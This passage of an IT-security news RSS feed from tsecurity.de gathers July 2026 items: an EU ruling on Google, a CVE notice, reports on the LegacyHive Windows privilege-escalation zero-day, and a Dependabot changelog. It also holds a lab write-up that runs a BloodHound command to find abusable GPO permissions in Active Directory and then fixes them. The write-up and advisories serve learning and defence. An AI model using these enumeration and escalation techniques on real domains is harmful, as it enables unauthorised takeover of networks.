<guid isPermaLink="true">https://tsecurity.de/de/3678341/it-security-nachrichten/eu-orders-google-to-open-search-data-and-android-features-to-competitors-amid-privacy-security-concerns/</guid>
<pubDate>Sat, 18 Jul 2026 19:53:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The European Commission has officially instructed Google to hand over its internal search registry to direct marketplace competitors. This groundbreaking legal command forces the massive American search provider to open its popular Android operating system to rival software tools. The binding specifications, which officials issued under the strict European Digital Markets Act, represent a major […]</p>
<p>The post <a href="https://privacysavvy.com/news/cybersecurity/eu-orders-google-open-search-data-android-features/">EU Orders Google to Open Search Data and Android Features to Competitors Amid Privacy, Security Concerns</a> appeared first on <a href="https://privacysavvy.com/">PrivacySavvy</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KDnuggets Weekly Roundup: Week of July 13, 2026]]></title>
<description><![CDATA[Stop Using If-Else Chains: Use the Registry Pattern in Python Instead • 5 Real-World SQL Projects to Build Your Data Portfolio • 10 YouTube Channels Keeping You Ahead in AI • Structured Language Model Generation with Outlines]]></description>
<link>https://tsecurity.de/de/3678054/ai-nachrichten/kdnuggets-weekly-roundup-week-of-july-13-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678054/ai-nachrichten/kdnuggets-weekly-roundup-week-of-july-13-2026/</guid>
<pubDate>Sat, 18 Jul 2026 15:20:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Stop Using If-Else Chains: Use the Registry Pattern in Python Instead • 5 Real-World SQL Projects to Build Your Data Portfolio • 10 YouTube Channels Keeping You Ahead in AI • Structured Language Model Generation with Outlines]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)]]></title>
<description><![CDATA[Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.But if the wrong user has control over a GPO, it can become an easy privilege escalation path.In this lab, I’ll use BloodHound to identify...]]></description>
<link>https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IYSV94Q4TKE53NHop9sBDw.png"></figure><p>Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.</p><p>But if the wrong user has control over a GPO, it can become an easy privilege escalation path.</p><p>In this lab, I’ll use <strong>BloodHound</strong> to identify a dangerous GPO permission and then show how to fix it.</p><h3>Lab Setup</h3><ul><li><strong>Domain:</strong> LAB.LOCAL</li><li><strong>Domain Controller:</strong> 192.168.56.104</li><li><strong>Attacker:</strong> Kali Linux</li><li><strong>User:</strong> bob</li></ul><h3>Step 1 — Collect Active Directory Data</h3><p>First, I collected information from Active Directory using <strong>BloodHound.py</strong>.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>BloodHound successfully collected:</p><ul><li>8 Users</li><li>55 Groups</li><li>3 GPOs</li><li>2 OUs</li><li>1 Computer</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jA0bN8_u-FCRSuDjOdIbFg.png"></figure><h3>Step 2 — Import into BloodHound</h3><p>Next, I uploaded the generated ZIP file into BloodHound Community Edition.</p><p>BloodHound maps relationships between users, groups, computers, OUs, and GPOs, making it much easier to spot privilege escalation paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T0gcQnP34CNfRQp0qFv4hw.png"></figure><h3>Step 3 — Finding the Misconfiguration</h3><p>BloodHound showed that <strong>Bob</strong> had <strong>WriteDacl</strong>, <strong>WriteOwner</strong>, and <strong>GenericWrite</strong> permissions over the <strong>Employees Policy</strong> GPO.</p><p>These permissions are dangerous because they allow a user to modify who controls the GPO or change its configuration.</p><h3>Why Is This Dangerous?</h3><p>If an attacker can edit a GPO linked to an Organizational Unit (OU), they may be able to:</p><ul><li>Execute scripts on domain computers</li><li>Deploy scheduled tasks</li><li>Add users to local Administrators</li><li>Push malicious registry changes</li><li>Gain higher privileges across the domain</li></ul><p>A single misconfigured GPO can impact many systems at once.</p><h3>Step 4 — Fixing the Issue</h3><p>On the Domain Controller:</p><pre>Group Policy Management<br>        ↓<br>Employees Policy<br>        ↓<br>Delegation</pre><p>Review who has permissions on the GPO.</p><p>Remove unnecessary permissions such as:</p><ul><li>GenericWrite</li><li>misconfiguredWriteDacl</li><li>WriteOwner</li></ul><p>Only trusted administrators should have these rights.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1021/1*FC8s8UA4FIWW0lay8j9Ikw.png"></figure><h3>Verify the Fix</h3><p>Run BloodHound again after updating the permissions.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>Re-import the ZIP into BloodHound.</p><p>The dangerous permission edges should no longer appear for <strong>Bob</strong>.</p><h3>Key Takeaways</h3><p>1.Regularly audit GPO permissions.</p><p>2. Use the principle of least privilege.</p><p>3. Review BloodHound findings periodically.</p><p>4. Remove unnecessary <strong>GenericWrite</strong>, <strong>WriteDacl</strong>, and <strong>WriteOwner</strong> permissions.</p><blockquote><strong><em>Disclaimer:</em></strong><em> </em>The techniques demonstrated in this article were performed in a private Active Directory lab for learning purposes. Always obtain proper authorization before testing any production environment.</blockquote><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5d59c031e602" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it-5d59c031e602">How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 Secure Boot certificates have expired, and Microsoft says what to do next]]></title>
<description><![CDATA[Microsoft closed its Secure Boot Office Hours event with engineers from Microsoft, HP, Dell, and Surface answering live IT admin questions on confidence ratings, the AvailableUpdates registry key, aging firmware, and legacy hardware ahead of the next certificate deadline on October 19.
The post W...]]></description>
<link>https://tsecurity.de/de/3677313/windows-tipps/windows-11-secure-boot-certificates-have-expired-and-microsoft-says-what-to-do-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677313/windows-tipps/windows-11-secure-boot-certificates-have-expired-and-microsoft-says-what-to-do-next/</guid>
<pubDate>Sat, 18 Jul 2026 03:39:04 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft closed its Secure Boot Office Hours event with engineers from Microsoft, HP, Dell, and Surface answering live IT admin questions on confidence ratings, the AvailableUpdates registry key, aging firmware, and legacy hardware ahead of the next certificate deadline on October 19.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/07/18/windows-11-secure-boot-certificates-have-expired-and-microsoft-says-what-to-do-next/">Windows 11 Secure Boot certificates have expired, and Microsoft says what to do next</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-48978 | oras-project oras-go up to 2.6.0 Client client.go Client.Do server-side request forgery (Nessus ID 327567)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in oras-project oras-go up to 2.6.0. This issue affects the function Client.Do of the file registry/remote/auth/client.go of the component Client. The manipulation results in server-side request forgery.

This vulnerability is cataloged as...]]></description>
<link>https://tsecurity.de/de/3677149/sicherheitsluecken/cve-2026-48978-oras-project-oras-go-up-to-260-client-clientgo-clientdo-server-side-request-forgery-nessus-id-327567/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677149/sicherheitsluecken/cve-2026-48978-oras-project-oras-go-up-to-260-client-clientgo-clientdo-server-side-request-forgery-nessus-id-327567/</guid>
<pubDate>Sat, 18 Jul 2026 00:24:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/oras-project:oras-go">oras-project oras-go up to 2.6.0</a>. This issue affects the function <code>Client.Do</code> of the file <em>registry/remote/auth/client.go</em> of the component <em>Client</em>. The manipulation results in server-side request forgery.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-48978">CVE-2026-48978</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[New Windows LegacyHive 0-Day Vulnerability Allows Hackers to Gain Admin Access]]></title>
<description><![CDATA[A Windows zero-day vulnerability, dubbed LegacyHive (MSNightmare), abuses the User Profile Service to enable local privilege escalation, tampering with administrator accounts, and admin-level code execution. LegacyHive targets the Windows User Profile Service (ProfSvc), which is responsible for l...]]></description>
<link>https://tsecurity.de/de/3676208/it-security-nachrichten/new-windows-legacyhive-0-day-vulnerability-allows-hackers-to-gain-admin-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676208/it-security-nachrichten/new-windows-legacyhive-0-day-vulnerability-allows-hackers-to-gain-admin-access/</guid>
<pubDate>Fri, 17 Jul 2026 15:38:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Windows zero-day vulnerability, dubbed LegacyHive (MSNightmare), abuses the User Profile Service to enable local privilege escalation, tampering with administrator accounts, and admin-level code execution. LegacyHive targets the Windows User Profile Service (ProfSvc), which is responsible for loading and unloading user profiles and their registry hives during logon and logoff. The public proof‑of‑concept (PoC) from the […]</p>
<p>The post <a href="https://cybersecuritynews.com/windows-legacyhive-0-day-vulnerability/">New Windows LegacyHive 0-Day Vulnerability Allows Hackers to Gain Admin Access</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives]]></title>
<description><![CDATA[A newly disclosed Windows local privilege-escalation vulnerability, dubbed LegacyHive, could allow a standard user to load and modify the per-user registry classes hive of an administrator account. The proof-of-concept (PoC), published by researcher NightmareEclipse under the MSNightmare/LegacyHi...]]></description>
<link>https://tsecurity.de/de/3676157/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676157/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</guid>
<pubDate>Fri, 17 Jul 2026 15:24:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed Windows local privilege-escalation vulnerability, dubbed LegacyHive, could allow a standard user to load and modify the per-user registry classes hive of an administrator account. The proof-of-concept (PoC), published by researcher NightmareEclipse under the MSNightmare/LegacyHive GitHub repository, abuses…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/">LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives]]></title>
<description><![CDATA[A newly disclosed local privilege escalation technique allows non-administrator Windows users to tamper with an administrator’s registry hive, opening the door to code execution at the administrator’s next login. Security researcher Will Dormann detailed the flaw after examining a proof-of-concep...]]></description>
<link>https://tsecurity.de/de/3676067/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676067/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</guid>
<pubDate>Fri, 17 Jul 2026 14:39:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed local privilege escalation technique allows non-administrator Windows users to tamper with an administrator’s registry hive, opening the door to code execution at the administrator’s next login. Security researcher Will Dormann detailed the flaw after examining a proof-of-concept tool called LegacyHive, released by developer NightmareEclipse on a self-hosted Git instance. LegacyHive exploits inconsistent […]</p>
<p>The post <a href="https://cyberpress.org/legacyhive-windows-zero-day/">LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives]]></title>
<description><![CDATA[A newly disclosed Windows local privilege-escalation vulnerability, dubbed LegacyHive, could allow a standard user to load and modify the per-user registry classes hive of an administrator account. The proof-of-concept (PoC), published by researcher NightmareEclipse under the MSNightmare/LegacyHi...]]></description>
<link>https://tsecurity.de/de/3676056/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676056/it-security-nachrichten/legacyhive-windows-zero-day-lets-attackers-hijack-administrator-registry-hives/</guid>
<pubDate>Fri, 17 Jul 2026 14:39:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed Windows local privilege-escalation vulnerability, dubbed LegacyHive, could allow a standard user to load and modify the per-user registry classes hive of an administrator account. The proof-of-concept (PoC), published by researcher NightmareEclipse under the MSNightmare/LegacyHive GitHub repository, abuses Windows’ User Profile Service to mount a target user’s UsrClass.dat hive into a registry location […]</p>
<p>The post <a href="https://gbhackers.com/legacyhive-windows-zero-day/">LegacyHive Windows Zero-Day Lets Attackers Hijack Administrator Registry Hives</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.387.0]]></title>
<description><![CDATA[What's Changed

Type the gradle, swift, and pre_commit ecosystems by @JamieMagee in #15534
Default cooldown to 3 days when default-days is not specified (behind a feature flag) by @robaiken with @Copilot in #15344
Use shared base cooldown in git_submodules by @robaiken in #15537
[Update graph] Av...]]></description>
<link>https://tsecurity.de/de/3674606/it-security-tools/v03870/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674606/it-security-tools/v03870/</guid>
<pubDate>Thu, 16 Jul 2026 22:33:50 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Type the gradle, swift, and pre_commit ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4834841548" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15534" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15534/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15534">#15534</a></li>
<li>Default cooldown to 3 days when default-days is not specified (behind a feature flag) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4684952757" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15344" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15344/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15344">#15344</a></li>
<li>Use shared base cooldown in git_submodules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4837613550" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15537" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15537/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15537">#15537</a></li>
<li>[Update graph] Avoid PathDependenciesNotReachable killing the whole job by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4830807905" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15522" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15522/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15522">#15522</a></li>
<li>[Update Graph] Ensure that txt/in pairs are included properly in layers when working out references by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4884201019" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15581" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15581/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15581">#15581</a></li>
<li>build(deps): bump opentofu to 1.12.1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RinseV/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RinseV">@RinseV</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597635124" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15231" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15231/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15231">#15231</a></li>
<li>Type the Sentry before_send processors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4879702128" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15569" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15569/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15569">#15569</a></li>
<li>Clear T.untyped from four strong updater files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4879809730" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15570" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15570/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15570">#15570</a></li>
<li>feat(opentofu): use registry API for multi-platform lockfile hashes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/diofeher/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/diofeher">@diofeher</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651320321" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15296" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15296/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15296">#15296</a></li>
<li>julia: various fixes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4851258737" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15549" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15549/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15549">#15549</a></li>
<li>Type git_metadata_fetcher's git responses by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4879876600" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15572" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15572/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15572">#15572</a></li>
<li>pre-commit: add regression tests for prerelease version filtering by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-HaripriyaC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-HaripriyaC">@v-HaripriyaC</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4840941300" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15542" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15542/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15542">#15542</a></li>
<li>add test ensuring duplicate PRs aren't submitted in security jobs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4887247831" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15584" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15584/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15584">#15584</a></li>
<li>Clear T.untyped from already-strong ecosystem files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4880025222" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15573" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15573/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15573">#15573</a></li>
<li>Update branch name case values to align with schema accepted values by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4896350580" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15592" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15592/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15592">#15592</a></li>
<li>julia: fix TypeError when a cooldown is configured by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4894957881" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15591" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15591/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15591">#15591</a></li>
<li>Fix codespell typo in updater job spec by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4900648669" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15599" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15599/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15599">#15599</a></li>
<li>Swift: SemVer-compliant version comparison and validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-HaripriyaC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-HaripriyaC">@v-HaripriyaC</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4891805578" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15589" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15589/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15589">#15589</a></li>
<li>Type git source details by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4896503633" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15593" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15593/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15593">#15593</a></li>
<li>Expose typed git source details by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4897605250" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15594" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15594/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15594">#15594</a></li>
<li>v0.387.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4904637892" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15604" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15604/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15604">#15604</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RinseV/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RinseV">@RinseV</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597635124" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15231" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15231/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15231">#15231</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.386.0...v0.387.0"><tt>v0.386.0...v0.387.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram t.me links disrupted over sanctioned VPN]]></title>
<description><![CDATA[Telegram’s widely used t.me shortlinks experienced a complete outage lasting roughly one day after the .ME domain registry suspended the domain in response to US sanctions targeting a VPN service popular with cybercriminals. This article has been indexed from CyberMaterial…
Read more →
The post T...]]></description>
<link>https://tsecurity.de/de/3673550/it-security-nachrichten/telegram-tme-links-disrupted-over-sanctioned-vpn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673550/it-security-nachrichten/telegram-tme-links-disrupted-over-sanctioned-vpn/</guid>
<pubDate>Thu, 16 Jul 2026 15:09:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s widely used t.me shortlinks experienced a complete outage lasting roughly one day after the .ME domain registry suspended the domain in response to US sanctions targeting a VPN service popular with cybercriminals. This article has been indexed from CyberMaterial…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/telegram-t-me-links-disrupted-over-sanctioned-vpn/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/telegram-t-me-links-disrupted-over-sanctioned-vpn/">Telegram t.me links disrupted over sanctioned VPN</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Romania’s land registry hit by cyber attack, data allegedly for sale]]></title>
